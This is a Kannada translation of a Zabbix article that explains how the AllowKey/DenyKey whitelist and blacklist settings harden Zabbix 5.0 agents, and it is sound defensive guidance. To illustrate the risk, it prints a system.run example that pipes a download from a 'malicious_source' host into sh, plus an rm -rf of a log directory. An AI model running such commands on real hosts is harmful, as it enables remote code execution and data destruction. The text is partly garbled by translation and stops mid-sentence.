Zabbix 5.0 ನಲ್ಲಿ ಏಜೆಂಟ್-ಸೈಡ್ ಮೆಟ್ರಿಕ್‌ಗಳಿಗೆ ಕಪ್ಪುಪಟ್ಟಿ ಮತ್ತು ಶ್ವೇತಪಟ್ಟಿ ಬೆಂಬಲ

ಏಜೆಂಟ್-ಸೈಡ್ ಮೆಟ್ರಿಕ್‌ಗಳಿಗೆ ಕಪ್ಪುಪಟ್ಟಿ ಮತ್ತು ಶ್ವೇತಪಟ್ಟಿ ಬೆಂಬಲ

ಟಿಖೋನ್ ಉಸ್ಕೋವ್, ಇಂಟಿಗ್ರೇಷನ್ ಇಂಜಿನಿಯರ್, ಜಬ್ಬಿಕ್ಸ್

ಡೇಟಾ ಭದ್ರತಾ ಸಮಸ್ಯೆಗಳು

Zabbix 5.0 ಹೊಸ ವೈಶಿಷ್ಟ್ಯವನ್ನು ಹೊಂದಿದ್ದು ಅದು Zabbix ಏಜೆಂಟ್ ಅನ್ನು ಬಳಸಿಕೊಂಡು ಸಿಸ್ಟಮ್‌ಗಳಲ್ಲಿ ಸುರಕ್ಷತೆಯನ್ನು ಸುಧಾರಿಸಲು ನಿಮಗೆ ಅನುಮತಿಸುತ್ತದೆ ಮತ್ತು ಹಳೆಯ ನಿಯತಾಂಕವನ್ನು ಬದಲಾಯಿಸುತ್ತದೆ ರಿಮೋಟ್ ಕಮಾಂಡ್‌ಗಳನ್ನು ಸಕ್ರಿಯಗೊಳಿಸಿ.

ಏಜೆಂಟ್-ಆಧಾರಿತ ವ್ಯವಸ್ಥೆಗಳ ಸುರಕ್ಷತೆಯಲ್ಲಿನ ಸುಧಾರಣೆಗಳು ಏಜೆಂಟರು ಹೆಚ್ಚಿನ ಸಂಖ್ಯೆಯ ಅಪಾಯಕಾರಿ ಕ್ರಿಯೆಗಳನ್ನು ಮಾಡಬಹುದು ಎಂಬ ಅಂಶದಿಂದ ಉಂಟಾಗುತ್ತವೆ.

• ಕಾನ್ಫಿಗರೇಶನ್ ಫೈಲ್‌ಗಳು, ಲಾಗ್ ಫೈಲ್‌ಗಳು, ಪಾಸ್‌ವರ್ಡ್ ಫೈಲ್‌ಗಳು ಅಥವಾ ಯಾವುದೇ ಇತರ ಫೈಲ್‌ಗಳಿಂದ ಗೌಪ್ಯ ಅಥವಾ ಸಂಭಾವ್ಯ ಅಪಾಯಕಾರಿ ಮಾಹಿತಿ ಸೇರಿದಂತೆ ಯಾವುದೇ ಮಾಹಿತಿಯನ್ನು ಏಜೆಂಟ್ ಸಂಗ್ರಹಿಸಬಹುದು.

ಉದಾಹರಣೆಗೆ, zabbix_get ಉಪಯುಕ್ತತೆಯನ್ನು ಬಳಸಿಕೊಂಡು ನೀವು ಬಳಕೆದಾರರ ಪಟ್ಟಿ, ಅವರ ಹೋಮ್ ಡೈರೆಕ್ಟರಿಗಳು, ಪಾಸ್‌ವರ್ಡ್ ಫೈಲ್‌ಗಳು ಇತ್ಯಾದಿಗಳನ್ನು ಪ್ರವೇಶಿಸಬಹುದು.

Zabbix_get ಉಪಯುಕ್ತತೆಯನ್ನು ಬಳಸಿಕೊಂಡು ಡೇಟಾವನ್ನು ಪ್ರವೇಶಿಸಲಾಗುತ್ತಿದೆ

ಸೂಚನೆ. ಅನುಗುಣವಾದ ಫೈಲ್‌ನಲ್ಲಿ ಏಜೆಂಟ್ ಓದಲು ಅನುಮತಿಗಳನ್ನು ಹೊಂದಿದ್ದರೆ ಮಾತ್ರ ಡೇಟಾವನ್ನು ಹಿಂಪಡೆಯಬಹುದು. ಆದರೆ, ಉದಾಹರಣೆಗೆ, ಫೈಲ್ /etc/passwd/ ಎಲ್ಲಾ ಬಳಕೆದಾರರಿಂದ ಓದಬಹುದಾಗಿದೆ.

• ಏಜೆಂಟ್ ಸಂಭಾವ್ಯ ಅಪಾಯಕಾರಿ ಆಜ್ಞೆಗಳನ್ನು ಸಹ ಕಾರ್ಯಗತಗೊಳಿಸಬಹುದು. ಉದಾಹರಣೆಗೆ, ಕೀ *system.run[]** ನೆಟ್‌ವರ್ಕ್ ನೋಡ್‌ಗಳಲ್ಲಿ ಯಾವುದೇ ರಿಮೋಟ್ ಕಮಾಂಡ್‌ಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲು ನಿಮಗೆ ಅನುಮತಿಸುತ್ತದೆ, ಜಬ್ಬಿಕ್ಸ್ ವೆಬ್ ಇಂಟರ್ಫೇಸ್‌ನಿಂದ ಚಾಲನೆಯಲ್ಲಿರುವ ಸ್ಕ್ರಿಪ್ಟ್‌ಗಳು ಸೇರಿದಂತೆ ಏಜೆಂಟ್ ಬದಿಯಲ್ಲಿ ಆಜ್ಞೆಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುತ್ತವೆ.

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

• ಲಿನಕ್ಸ್‌ನಲ್ಲಿ, ಏಜೆಂಟ್ ರೂಟ್ ಸವಲತ್ತುಗಳಿಲ್ಲದೆ ಪೂರ್ವನಿಯೋಜಿತವಾಗಿ ಚಲಿಸುತ್ತದೆ, ಆದರೆ ವಿಂಡೋಸ್‌ನಲ್ಲಿ ಇದು ಸಿಸ್ಟಮ್‌ನಂತೆ ಸೇವೆಯಾಗಿ ಚಲಿಸುತ್ತದೆ ಮತ್ತು ಫೈಲ್ ಸಿಸ್ಟಮ್‌ಗೆ ಅನಿಯಂತ್ರಿತ ಪ್ರವೇಶವನ್ನು ಹೊಂದಿರುತ್ತದೆ. ಅಂತೆಯೇ, ಅನುಸ್ಥಾಪನೆಯ ನಂತರ Zabbix ಏಜೆಂಟ್ ಪ್ಯಾರಾಮೀಟರ್‌ಗಳಿಗೆ ಯಾವುದೇ ಬದಲಾವಣೆಗಳನ್ನು ಮಾಡದಿದ್ದರೆ, ಏಜೆಂಟ್ ರಿಜಿಸ್ಟ್ರಿ, ಫೈಲ್ ಸಿಸ್ಟಮ್‌ಗೆ ಪ್ರವೇಶವನ್ನು ಹೊಂದಿರುತ್ತಾನೆ ಮತ್ತು WMI ಪ್ರಶ್ನೆಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಬಹುದು.

ಹಿಂದಿನ ಆವೃತ್ತಿಗಳಲ್ಲಿ ಪ್ಯಾರಾಮೀಟರ್ EnableRemoteCommands=0 ಕೀಲಿಯೊಂದಿಗೆ ಮೆಟ್ರಿಕ್‌ಗಳನ್ನು ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಲು ಮಾತ್ರ ಅನುಮತಿಸಲಾಗಿದೆ *system.run[]** ಮತ್ತು ವೆಬ್ ಇಂಟರ್‌ಫೇಸ್‌ನಿಂದ ಚಾಲನೆಯಲ್ಲಿರುವ ಸ್ಕ್ರಿಪ್ಟ್‌ಗಳು, ಆದರೆ ಪ್ರತ್ಯೇಕ ಫೈಲ್‌ಗಳಿಗೆ ಪ್ರವೇಶವನ್ನು ನಿರ್ಬಂಧಿಸಲು, ಏಜೆಂಟ್‌ನೊಂದಿಗೆ ಸ್ಥಾಪಿಸಲಾದ ಪ್ರತ್ಯೇಕ ಕೀಗಳನ್ನು ಅನುಮತಿಸಲು ಅಥವಾ ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಲು ಅಥವಾ ಪ್ರತ್ಯೇಕ ನಿಯತಾಂಕಗಳ ಬಳಕೆಯನ್ನು ಮಿತಿಗೊಳಿಸಲು ಯಾವುದೇ ಮಾರ್ಗವಿರಲಿಲ್ಲ.

Zabbix ನ ಹಿಂದಿನ ಆವೃತ್ತಿಗಳಲ್ಲಿ EnableRemoteCommand ನಿಯತಾಂಕವನ್ನು ಬಳಸುವುದು

AllowKey/DenyKey

ಏಜೆಂಟ್ ಭಾಗದಲ್ಲಿ ಮೆಟ್ರಿಕ್‌ಗಳನ್ನು ಅನುಮತಿಸಲು ಮತ್ತು ನಿರಾಕರಿಸಲು ಶ್ವೇತಪಟ್ಟಿಗಳು ಮತ್ತು ಕಪ್ಪುಪಟ್ಟಿಗಳನ್ನು ಒದಗಿಸುವ ಮೂಲಕ ಜಬ್ಬಿಕ್ಸ್ 5.0 ಅಂತಹ ಅನಧಿಕೃತ ಪ್ರವೇಶದಿಂದ ರಕ್ಷಿಸಲು ಸಹಾಯ ಮಾಡುತ್ತದೆ.

Zabbix 5.0 ನಲ್ಲಿ * ಸೇರಿದಂತೆ ಎಲ್ಲಾ ಕೀಗಳುsystem.run[]** ಅನ್ನು ಸಕ್ರಿಯಗೊಳಿಸಲಾಗಿದೆ ಮತ್ತು ಎರಡು ಹೊಸ ಏಜೆಂಟ್ ಕಾನ್ಫಿಗರೇಶನ್ ಆಯ್ಕೆಗಳನ್ನು ಸೇರಿಸಲಾಗಿದೆ:

AllowKey= - ಅನುಮತಿ ತಪಾಸಣೆ;

DenyKey= - ನಿಷೇಧಿತ ತಪಾಸಣೆ;

ಮೆಟಾಕ್ಯಾರೆಕ್ಟರ್‌ಗಳನ್ನು (*) ಬಳಸುವ ಪ್ಯಾರಾಮೀಟರ್‌ಗಳೊಂದಿಗೆ ಪ್ರಮುಖ ಹೆಸರಿನ ಮಾದರಿ ಎಲ್ಲಿದೆ.

AllowKey ಮತ್ತು DenyKey ಕೀಗಳು ನಿರ್ದಿಷ್ಟ ಮಾದರಿಯ ಆಧಾರದ ಮೇಲೆ ಪ್ರತ್ಯೇಕ ಮೆಟ್ರಿಕ್‌ಗಳನ್ನು ಅನುಮತಿಸಲು ಅಥವಾ ನಿರಾಕರಿಸಲು ನಿಮಗೆ ಅನುಮತಿಸುತ್ತದೆ. ಇತರ ಕಾನ್ಫಿಗರೇಶನ್ ಪ್ಯಾರಾಮೀಟರ್‌ಗಳಂತೆ, AllowKey/DenyKey ಪ್ಯಾರಾಮೀಟರ್‌ಗಳ ಸಂಖ್ಯೆಯು ಸೀಮಿತವಾಗಿಲ್ಲ. ಚೆಕ್‌ಗಳ ವೃಕ್ಷವನ್ನು ರಚಿಸುವ ಮೂಲಕ ಸಿಸ್ಟಮ್‌ನಲ್ಲಿ ಏಜೆಂಟ್ ನಿಖರವಾಗಿ ಏನು ಮಾಡಬಹುದು ಎಂಬುದನ್ನು ಸ್ಪಷ್ಟವಾಗಿ ವ್ಯಾಖ್ಯಾನಿಸಲು ಇದು ನಿಮ್ಮನ್ನು ಅನುಮತಿಸುತ್ತದೆ - ಕಾರ್ಯಗತಗೊಳಿಸಬಹುದಾದ ಕೀಗಳು, ಅಲ್ಲಿ ಅವುಗಳನ್ನು ಬರೆಯುವ ಕ್ರಮವು ಬಹಳ ಮುಖ್ಯವಾದ ಪಾತ್ರವನ್ನು ವಹಿಸುತ್ತದೆ.

ನಿಯಮಗಳ ಅನುಕ್ರಮ

ನಿಯಮಗಳನ್ನು ಕಾನ್ಫಿಗರೇಶನ್ ಫೈಲ್‌ಗೆ ನಮೂದಿಸಿದ ಕ್ರಮದಲ್ಲಿ ಪರಿಶೀಲಿಸಲಾಗುತ್ತದೆ. ಮೊದಲ ಪಂದ್ಯದ ಮೊದಲು ನಿಯಮಗಳ ಪ್ರಕಾರ ಕೀಲಿಯನ್ನು ಪರಿಶೀಲಿಸಲಾಗುತ್ತದೆ ಮತ್ತು ಡೇಟಾ ಅಂಶದ ಕೀಲಿಯು ಮಾದರಿಗೆ ಹೊಂದಿಕೆಯಾದ ತಕ್ಷಣ, ಅದನ್ನು ಅನುಮತಿಸಲಾಗುತ್ತದೆ ಅಥವಾ ನಿರಾಕರಿಸಲಾಗುತ್ತದೆ. ಇದರ ನಂತರ, ನಿಯಮ ಪರಿಶೀಲನೆ ನಿಲ್ಲುತ್ತದೆ ಮತ್ತು ಉಳಿದ ಕೀಗಳನ್ನು ನಿರ್ಲಕ್ಷಿಸಲಾಗುತ್ತದೆ.

ಆದ್ದರಿಂದ, ಒಂದು ಅಂಶವು ಅವಕಾಶ ಮತ್ತು ನಿರಾಕರಣೆ ನಿಯಮ ಎರಡಕ್ಕೂ ಹೊಂದಿಕೆಯಾದರೆ, ಫಲಿತಾಂಶವು ಕಾನ್ಫಿಗರೇಶನ್ ಫೈಲ್‌ನಲ್ಲಿ ಯಾವ ನಿಯಮವು ಮೊದಲು ಇದೆ ಎಂಬುದರ ಮೇಲೆ ಅವಲಂಬಿತವಾಗಿರುತ್ತದೆ.

ಒಂದೇ ಮಾದರಿ ಮತ್ತು ಕೀಲಿಯೊಂದಿಗೆ 2 ವಿಭಿನ್ನ ನಿಯಮಗಳು vfs.file.size[/tmp/file]

AllowKey/DenyKey ಕೀಗಳನ್ನು ಬಳಸುವ ಕ್ರಮ:

1. ನಿಖರವಾದ ನಿಯಮಗಳು,
2. ಸಾಮಾನ್ಯ ನಿಯಮಗಳು,
3. ನಿಷೇಧಿತ ನಿಯಮ.

ಉದಾಹರಣೆಗೆ, ನಿಮಗೆ ನಿರ್ದಿಷ್ಟ ಫೋಲ್ಡರ್‌ನಲ್ಲಿ ಫೈಲ್‌ಗಳಿಗೆ ಪ್ರವೇಶ ಬೇಕಾದರೆ, ನೀವು ಮೊದಲು ಅವುಗಳಿಗೆ ಪ್ರವೇಶವನ್ನು ಅನುಮತಿಸಬೇಕು ಮತ್ತು ನಂತರ ಸ್ಥಾಪಿಸಲಾದ ಅನುಮತಿಗಳೊಳಗೆ ಬರದ ಎಲ್ಲವನ್ನೂ ನಿರಾಕರಿಸಬೇಕು. ನಿರಾಕರಣೆ ನಿಯಮವನ್ನು ಮೊದಲು ಬಳಸಿದರೆ, ಫೋಲ್ಡರ್ಗೆ ಪ್ರವೇಶವನ್ನು ನಿರಾಕರಿಸಲಾಗುತ್ತದೆ.

ಸರಿಯಾದ ಅನುಕ್ರಮ

* ಮೂಲಕ ಚಲಾಯಿಸಲು 2 ಉಪಯುಕ್ತತೆಗಳನ್ನು ನೀವು ಅನುಮತಿಸಬೇಕಾದರೆsystem.run[]**, ಮತ್ತು ನಿರಾಕರಿಸುವ ನಿಯಮವನ್ನು ಮೊದಲು ನಿರ್ದಿಷ್ಟಪಡಿಸಲಾಗುತ್ತದೆ, ಉಪಯುಕ್ತತೆಗಳನ್ನು ಪ್ರಾರಂಭಿಸಲಾಗುವುದಿಲ್ಲ, ಏಕೆಂದರೆ ಮೊದಲ ಮಾದರಿಯು ಯಾವಾಗಲೂ ಯಾವುದೇ ಕೀಗೆ ಹೊಂದಿಕೆಯಾಗುತ್ತದೆ ಮತ್ತು ನಂತರದ ನಿಯಮಗಳನ್ನು ನಿರ್ಲಕ್ಷಿಸಲಾಗುತ್ತದೆ.

ತಪ್ಪಾದ ಅನುಕ್ರಮ

ಪ್ಯಾಟರ್ನ್ಸ್

ಮೂಲ ನಿಯಮಗಳು

ಪ್ಯಾಟರ್ನ್ ವೈಲ್ಡ್‌ಕಾರ್ಡ್‌ಗಳೊಂದಿಗಿನ ಅಭಿವ್ಯಕ್ತಿಯಾಗಿದೆ. ಮೆಟಾಕ್ಯಾರೆಕ್ಟರ್ (*) ನಿರ್ದಿಷ್ಟ ಸ್ಥಾನದಲ್ಲಿರುವ ಯಾವುದೇ ಅಕ್ಷರಗಳಿಗೆ ಹೊಂದಿಕೆಯಾಗುತ್ತದೆ. ಮೆಟಾಕ್ಯಾರೆಕ್ಟರ್‌ಗಳನ್ನು ಪ್ರಮುಖ ಹೆಸರು ಮತ್ತು ನಿಯತಾಂಕಗಳಲ್ಲಿ ಬಳಸಬಹುದು. ಉದಾಹರಣೆಗೆ, ನೀವು ಮೊದಲ ಪ್ಯಾರಾಮೀಟರ್ ಅನ್ನು ಪಠ್ಯದೊಂದಿಗೆ ಕಟ್ಟುನಿಟ್ಟಾಗಿ ವ್ಯಾಖ್ಯಾನಿಸಬಹುದು, ಮತ್ತು ನಂತರದದನ್ನು ವೈಲ್ಡ್‌ಕಾರ್ಡ್ ಎಂದು ಸೂಚಿಸಿ.

ನಿಯತಾಂಕಗಳನ್ನು ಚದರ ಆವರಣಗಳಲ್ಲಿ ಸುತ್ತುವರಿಯಬೇಕು [].

• system.run[* - ತಪ್ಪು
• vfs.file*.txt] - ತಪ್ಪು
• vfs.file.*[*] - ಸರಿ

ವೈಲ್ಡ್ಕಾರ್ಡ್ ಬಳಸುವ ಉದಾಹರಣೆಗಳು.

1. ಪ್ರಮುಖ ಹೆಸರಿನಲ್ಲಿ ಮತ್ತು ನಿಯತಾಂಕದಲ್ಲಿ. ಈ ಸಂದರ್ಭದಲ್ಲಿ, ಕೀಲಿಯು ನಿಯತಾಂಕವನ್ನು ಹೊಂದಿರದ ಒಂದೇ ರೀತಿಯ ಕೀಗೆ ಹೊಂದಿಕೆಯಾಗುವುದಿಲ್ಲ, ಏಕೆಂದರೆ ಮಾದರಿಯಲ್ಲಿ ನಾವು ಪ್ರಮುಖ ಹೆಸರಿನ ನಿರ್ದಿಷ್ಟ ಅಂತ್ಯ ಮತ್ತು ನಿರ್ದಿಷ್ಟ ನಿಯತಾಂಕಗಳನ್ನು ಸ್ವೀಕರಿಸಲು ಬಯಸುತ್ತೇವೆ ಎಂದು ಸೂಚಿಸಿದ್ದೇವೆ.
2. ಮಾದರಿಯು ಚೌಕ ಬ್ರಾಕೆಟ್‌ಗಳನ್ನು ಬಳಸದಿದ್ದರೆ, ಪ್ಯಾರಾಮೀಟರ್‌ಗಳನ್ನು ಹೊಂದಿರದ ಎಲ್ಲಾ ಕೀಗಳನ್ನು ಪ್ಯಾಟರ್ನ್ ಅನುಮತಿಸುತ್ತದೆ ಮತ್ತು ನಿರ್ದಿಷ್ಟಪಡಿಸಿದ ನಿಯತಾಂಕವನ್ನು ಹೊಂದಿರುವ ಎಲ್ಲಾ ಕೀಗಳನ್ನು ನಿರಾಕರಿಸುತ್ತದೆ.
3. ಕೀಲಿಯು ಪೂರ್ಣವಾಗಿ ಬರೆಯಲ್ಪಟ್ಟಿದ್ದರೆ ಮತ್ತು ನಿಯತಾಂಕಗಳನ್ನು ವೈಲ್ಡ್‌ಕಾರ್ಡ್ ಎಂದು ನಿರ್ದಿಷ್ಟಪಡಿಸಿದರೆ, ಅದು ಯಾವುದೇ ನಿಯತಾಂಕಗಳೊಂದಿಗೆ ಯಾವುದೇ ರೀತಿಯ ಕೀಗೆ ಹೊಂದಿಕೆಯಾಗುತ್ತದೆ ಮತ್ತು ಚದರ ಬ್ರಾಕೆಟ್‌ಗಳಿಲ್ಲದ ಕೀಗೆ ಹೊಂದಿಕೆಯಾಗುವುದಿಲ್ಲ, ಅಂದರೆ ಅದನ್ನು ಅನುಮತಿಸಲಾಗುತ್ತದೆ ಅಥವಾ ನಿರಾಕರಿಸಲಾಗುತ್ತದೆ.

ನಿಯತಾಂಕಗಳನ್ನು ಭರ್ತಿ ಮಾಡುವ ನಿಯಮಗಳು.

• ನಿಯತಾಂಕಗಳನ್ನು ಹೊಂದಿರುವ ಕೀಲಿಯನ್ನು ಬಳಸಲು ಉದ್ದೇಶಿಸಿದ್ದರೆ, ನಿಯತಾಂಕಗಳನ್ನು ಕಾನ್ಫಿಗರೇಶನ್ ಫೈಲ್‌ನಲ್ಲಿ ನಿರ್ದಿಷ್ಟಪಡಿಸಬೇಕು. ನಿಯತಾಂಕಗಳನ್ನು ಮೆಟಾಕ್ಯಾರೆಕ್ಟರ್ ಆಗಿ ನಿರ್ದಿಷ್ಟಪಡಿಸಬೇಕು. ಯಾವುದೇ ಫೈಲ್‌ಗೆ ಪ್ರವೇಶವನ್ನು ಎಚ್ಚರಿಕೆಯಿಂದ ನಿರಾಕರಿಸುವುದು ಮತ್ತು ಮೆಟ್ರಿಕ್ ವಿಭಿನ್ನ ಕಾಗುಣಿತಗಳ ಅಡಿಯಲ್ಲಿ ಯಾವ ಮಾಹಿತಿಯನ್ನು ಒದಗಿಸಬಹುದು ಎಂಬುದನ್ನು ಗಣನೆಗೆ ತೆಗೆದುಕೊಳ್ಳುವುದು ಅವಶ್ಯಕ - ನಿಯತಾಂಕಗಳೊಂದಿಗೆ ಮತ್ತು ಇಲ್ಲದೆ.

ನಿಯತಾಂಕಗಳೊಂದಿಗೆ ಕೀಲಿಗಳನ್ನು ಬರೆಯುವ ವೈಶಿಷ್ಟ್ಯಗಳು

• ಒಂದು ಕೀಲಿಯನ್ನು ನಿಯತಾಂಕಗಳೊಂದಿಗೆ ನಿರ್ದಿಷ್ಟಪಡಿಸಿದರೆ, ಆದರೆ ನಿಯತಾಂಕಗಳು ಐಚ್ಛಿಕವಾಗಿರುತ್ತವೆ ಮತ್ತು ಮೆಟಾಕ್ಯಾರೆಕ್ಟರ್ ಎಂದು ನಿರ್ದಿಷ್ಟಪಡಿಸಿದರೆ, ನಿಯತಾಂಕಗಳಿಲ್ಲದ ಕೀಲಿಯನ್ನು ಪರಿಹರಿಸಲಾಗುತ್ತದೆ. ಉದಾಹರಣೆಗೆ, ನೀವು CPU ನಲ್ಲಿನ ಲೋಡ್ ಬಗ್ಗೆ ಮಾಹಿತಿಯನ್ನು ಸ್ವೀಕರಿಸುವುದನ್ನು ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಲು ಬಯಸಿದರೆ ಮತ್ತು system.cpu.load[*] ಕೀಲಿಯನ್ನು ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಬೇಕೆಂದು ನಿರ್ದಿಷ್ಟಪಡಿಸಿದರೆ, ನಿಯತಾಂಕಗಳಿಲ್ಲದ ಕೀ ಸರಾಸರಿ ಲೋಡ್ ಮೌಲ್ಯವನ್ನು ಹಿಂದಿರುಗಿಸುತ್ತದೆ ಎಂಬುದನ್ನು ಮರೆಯಬೇಡಿ.

ನಿಯತಾಂಕಗಳನ್ನು ಭರ್ತಿ ಮಾಡುವ ನಿಯಮಗಳು

ಟಿಪ್ಪಣಿಗಳು

ಹೊಂದಾಣಿಕೆ

• ಕೆಲವು ನಿಯಮಗಳನ್ನು ಬಳಕೆದಾರರಿಂದ ಬದಲಾಯಿಸಲಾಗುವುದಿಲ್ಲ, ಉದಾಹರಣೆಗೆ, ಅನ್ವೇಷಣೆ ನಿಯಮಗಳು ಅಥವಾ ಏಜೆಂಟ್ ಸ್ವಯಂ-ನೋಂದಣಿ ನಿಯಮಗಳು. AllowKey/DenyKey ನಿಯಮಗಳು ಈ ಕೆಳಗಿನ ನಿಯತಾಂಕಗಳ ಮೇಲೆ ಪರಿಣಾಮ ಬೀರುವುದಿಲ್ಲ:
  - ಹೋಸ್ಟ್ ಹೆಸರು ಐಟಂ
  - HostMetadataItem
  - HostInterfaceItem

ಸೂಚನೆ. ನಿರ್ವಾಹಕರು ಕೀಲಿಯನ್ನು ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಿದರೆ, ಪ್ರಶ್ನಿಸಿದಾಗ, ಮೆಟ್ರಿಕ್ ಅಥವಾ ಕೀ 'ವರ್ಗಕ್ಕೆ ಏಕೆ ಬರುತ್ತದೆ ಎಂಬುದರ ಕುರಿತು Zabbix ಮಾಹಿತಿಯನ್ನು ಒದಗಿಸುವುದಿಲ್ಲ.ಬೆಂಬಲಿಸುವುದಿಲ್ಲ'. ರಿಮೋಟ್ ಕಮಾಂಡ್‌ಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುವ ನಿಷೇಧಗಳ ಬಗ್ಗೆ ಮಾಹಿತಿಯನ್ನು ಏಜೆಂಟ್ ಲಾಗ್ ಫೈಲ್‌ಗಳಲ್ಲಿ ಪ್ರದರ್ಶಿಸಲಾಗುವುದಿಲ್ಲ. ಇದು ಭದ್ರತಾ ಕಾರಣಗಳಿಗಾಗಿ, ಆದರೆ ಕೆಲವು ಕಾರಣಗಳಿಗಾಗಿ ಮೆಟ್ರಿಕ್‌ಗಳು ಬೆಂಬಲವಿಲ್ಲದ ವರ್ಗಕ್ಕೆ ಬಂದರೆ ಡೀಬಗ್ ಮಾಡುವಿಕೆಯನ್ನು ಸಂಕೀರ್ಣಗೊಳಿಸಬಹುದು.

• ಬಾಹ್ಯ ಕಾನ್ಫಿಗರೇಶನ್ ಫೈಲ್‌ಗಳನ್ನು ಸಂಪರ್ಕಿಸಲು ನೀವು ಯಾವುದೇ ನಿರ್ದಿಷ್ಟ ಕ್ರಮವನ್ನು ಅವಲಂಬಿಸಬಾರದು (ಉದಾಹರಣೆಗೆ, ವರ್ಣಮಾಲೆಯ ಕ್ರಮದಲ್ಲಿ).

ಕಮಾಂಡ್ ಲೈನ್ ಉಪಯುಕ್ತತೆಗಳು

ನಿಯಮಗಳನ್ನು ಸ್ಥಾಪಿಸಿದ ನಂತರ, ಎಲ್ಲವನ್ನೂ ಸರಿಯಾಗಿ ಕಾನ್ಫಿಗರ್ ಮಾಡಲಾಗಿದೆ ಎಂದು ನೀವು ಖಚಿತಪಡಿಸಿಕೊಳ್ಳಬೇಕು.

ನೀವು ಮೂರು ಆಯ್ಕೆಗಳಲ್ಲಿ ಒಂದನ್ನು ಬಳಸಬಹುದು:

• Zabbix ಗೆ ಮೆಟ್ರಿಕ್ ಸೇರಿಸಿ.
• ಇದರೊಂದಿಗೆ ಪರೀಕ್ಷಿಸಿ zabbix_agentd. ಆಯ್ಕೆಯೊಂದಿಗೆ Zabbix ಏಜೆಂಟ್ -ಮುದ್ರಣ (-p) ಕಾನ್ಫಿಗರೇಶನ್‌ನಿಂದ ಅನುಮತಿಸದ ಕೀಗಳನ್ನು ಹೊರತುಪಡಿಸಿ ಎಲ್ಲಾ ಕೀಗಳನ್ನು (ಪೂರ್ವನಿಯೋಜಿತವಾಗಿ ಅನುಮತಿಸಲಾಗಿದೆ) ತೋರಿಸುತ್ತದೆ. ಮತ್ತು ಆಯ್ಕೆಯೊಂದಿಗೆ -ಪರೀಕ್ಷೆ (-ಟಿ) ಒಂದು ನಿಷೇಧಿತ ಕೀ ಹಿಂತಿರುಗುತ್ತದೆಬೆಂಬಲಿತವಲ್ಲದ ಐಟಂ ಕೀ'.
• ಇದರೊಂದಿಗೆ ಪರೀಕ್ಷಿಸಿ zabbix_get. ಉಪಯುಕ್ತತೆ zabbix_get ಆಯ್ಕೆಯೊಂದಿಗೆ -k ಹಿಂತಿರುಗುತ್ತೇನೆ'ZBX_NOTSUPPORTED: ಅಜ್ಞಾತ ಮೆಟ್ರಿಕ್'.

ಅನುಮತಿಸಿ ಅಥವಾ ನಿರಾಕರಿಸಿ

ನೀವು ಫೈಲ್‌ಗೆ ಪ್ರವೇಶವನ್ನು ನಿರಾಕರಿಸಬಹುದು ಮತ್ತು ಪರಿಶೀಲಿಸಬಹುದು, ಉದಾಹರಣೆಗೆ, ಉಪಯುಕ್ತತೆಯನ್ನು ಬಳಸಿ zabbix_getಫೈಲ್‌ಗೆ ಪ್ರವೇಶವನ್ನು ನಿರಾಕರಿಸಲಾಗಿದೆ.

**

ಸೂಚನೆ. ನಿಯತಾಂಕದಲ್ಲಿನ ಉಲ್ಲೇಖಗಳನ್ನು ನಿರ್ಲಕ್ಷಿಸಲಾಗಿದೆ.

ಈ ಸಂದರ್ಭದಲ್ಲಿ, ಅಂತಹ ಫೈಲ್‌ಗೆ ಪ್ರವೇಶವನ್ನು ಬೇರೆ ಮಾರ್ಗದ ಮೂಲಕ ಅನುಮತಿಸಬಹುದು. ಉದಾಹರಣೆಗೆ, ಸಿಮ್ಲಿಂಕ್ ಅದಕ್ಕೆ ಕಾರಣವಾದರೆ.

ನಿರ್ದಿಷ್ಟಪಡಿಸಿದ ನಿಯಮಗಳನ್ನು ಅನ್ವಯಿಸಲು ವಿವಿಧ ಆಯ್ಕೆಗಳನ್ನು ಪರಿಶೀಲಿಸಲು ಶಿಫಾರಸು ಮಾಡಲಾಗಿದೆ, ಮತ್ತು ನಿಷೇಧಗಳನ್ನು ತಪ್ಪಿಸುವ ಸಾಧ್ಯತೆಗಳನ್ನು ಸಹ ಗಣನೆಗೆ ತೆಗೆದುಕೊಳ್ಳಿ.

ಪ್ರಶ್ನೆಗಳು ಮತ್ತು ಉತ್ತರಗಳು

ನಿಮ್ಮ ಪ್ರಶ್ನೆ. ನಿಯಮಗಳು, ಅನುಮತಿಗಳು ಮತ್ತು ನಿಷೇಧಗಳನ್ನು ವಿವರಿಸಲು ತನ್ನದೇ ಆದ ಭಾಷೆಯೊಂದಿಗೆ ಅಂತಹ ಸಂಕೀರ್ಣ ಮಾದರಿಯನ್ನು ಏಕೆ ಆಯ್ಕೆ ಮಾಡಲಾಗಿದೆ? ಉದಾಹರಣೆಗೆ, Zabbix ಬಳಸುವ ನಿಯಮಿತ ಅಭಿವ್ಯಕ್ತಿಗಳನ್ನು ಬಳಸಲು ಏಕೆ ಸಾಧ್ಯವಾಗಲಿಲ್ಲ?

ಉತ್ತರಿಸಿ. ಇದು ರಿಜೆಕ್ಸ್ ಕಾರ್ಯಕ್ಷಮತೆಯ ಸಮಸ್ಯೆಯಾಗಿದೆ ಏಕೆಂದರೆ ಸಾಮಾನ್ಯವಾಗಿ ಒಬ್ಬ ಏಜೆಂಟ್ ಮಾತ್ರ ಇರುವುದರಿಂದ ಮತ್ತು ಇದು ಹೆಚ್ಚಿನ ಸಂಖ್ಯೆಯ ಮೆಟ್ರಿಕ್‌ಗಳನ್ನು ಪರಿಶೀಲಿಸುತ್ತದೆ. Regex ಸಾಕಷ್ಟು ಭಾರೀ ಕಾರ್ಯಾಚರಣೆಯಾಗಿದೆ ಮತ್ತು ನಾವು ಈ ರೀತಿಯಲ್ಲಿ ಸಾವಿರಾರು ಮೆಟ್ರಿಕ್‌ಗಳನ್ನು ಪರಿಶೀಲಿಸಲು ಸಾಧ್ಯವಿಲ್ಲ. ವೈಲ್ಡ್ಕಾರ್ಡ್ಗಳು - ಸಾರ್ವತ್ರಿಕ, ವ್ಯಾಪಕವಾಗಿ 